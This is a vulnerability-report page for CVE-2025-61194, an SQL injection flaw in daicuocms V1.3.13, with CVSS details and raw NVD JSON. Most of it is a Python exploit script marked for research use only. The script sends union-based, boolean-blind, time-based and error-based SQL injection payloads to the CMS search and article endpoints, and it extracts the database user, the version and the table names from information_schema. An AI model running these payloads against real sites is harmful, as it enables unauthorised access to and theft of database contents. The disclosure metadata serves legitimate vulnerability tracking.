Security Vulnerability Report
CVE-2025-61194 CVSS 6.5 MEDIUM

CVE-2025-61194

Published: 2025-10-21 16:15:39
Last Modified: 2025-10-23 12:34:58

Description

daicuocms V1.3.13 contains a SQL injection vulnerability in the file library\think\db\Builder.php.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:daicuo:daicuo:1.3.13:*:*:*:*:*:*:* - VULNERABLE
daicuocms V1.3.13

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61194 - daicuocms V1.3.13 SQL Injection PoC
# Target file: library\think\db\Builder.php
# Vulnerability: Unparameterized SQL query construction
import time

import requests

TARGET_URL = "http://target-daicuocms-site.com"

# Example 1: Basic SQL Injection via search parameter
# The Builder.php fails to sanitize user input before constructing SQL queries
payload_1 = {
    "keyword": "test' UNION SELECT 1,user(),database(),4,5,6-- "
}
response_1 = requests.get(f"{TARGET_URL}/index.php?s=search/index", params=payload_1)
print("[*] Union-based injection response:")
print(response_1.text[:500])


# Example 2: Boolean-based blind SQL injection
# Test if the injection works by checking response differences
def check_injection(url, param_name, param_value):
    # Normal request
    normal_resp = requests.get(url, params={param_name: param_value})
    # Injection request with TRUE condition
    true_resp = requests.get(url, params={param_name: f"{param_value}' AND 1=1-- "})
    # Injection request with FALSE condition
    false_resp = requests.get(url, params={param_name: f"{param_value}' AND 1=2-- "})
    if true_resp.text != false_resp.text and true_resp.text == normal_resp.text:
        print(f"[+] SQL Injection confirmed at parameter: {param_name}")
        return True
    return False


# Example 3: Time-based blind SQL injection
def time_based_injection(url, param_name, param_value):
    start_time = time.time()
    payload = f"{param_value}' AND SLEEP(5)-- "
    requests.get(url, params={param_name: payload})
    elapsed = time.time() - start_time
    if elapsed >= 5:
        print(f"[+] Time-based SQL Injection confirmed! Delay: {elapsed:.2f}s")
        return True
    return False


# Example 4: Extracting database version via error-based injection
payload_error = {
    "id": "1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e))-- "
}
response_error = requests.get(f"{TARGET_URL}/index.php?s=article/detail", params=payload_error)
print("[*] Error-based injection response:")
print(response_error.text[:500])

# Example 5: Extracting table names
payload_tables = {
    "keyword": "test' UNION SELECT group_concat(table_name),2,3,4,5 FROM information_schema.tables WHERE table_schema=database()-- "
}
response_tables = requests.get(f"{TARGET_URL}/index.php?s=search/index", params=payload_tables)
print("[*] Table extraction response:")
print(response_tables.text[:500])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61194", "sourceIdentifier": "[email protected]", "published": "2025-10-21T16:15:38.663", "lastModified": "2025-10-23T12:34:57.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "daicuocms V1.3.13 contains a SQL injection vulnerability in the file library\\think\\db\\Builder.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:daicuo:daicuo:1.3.13:*:*:*:*:*:*:*", "matchCriteriaId": "955C183A-BCCB-426E-9E29-429EA6B48DD6"}]}]}], "references": [{"url": "https://github.com/wzy-most/zeyu-Wang/blob/main/sql/readme.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}